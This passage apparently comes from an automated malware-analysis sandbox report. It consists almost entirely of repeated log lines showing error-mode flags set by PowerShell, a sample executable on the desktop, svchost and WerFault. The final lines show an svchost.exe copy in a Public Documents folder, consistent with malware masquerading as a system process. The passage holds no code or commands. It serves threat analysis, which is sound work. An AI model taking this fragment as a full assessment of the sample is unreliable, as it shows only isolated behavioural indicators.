            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
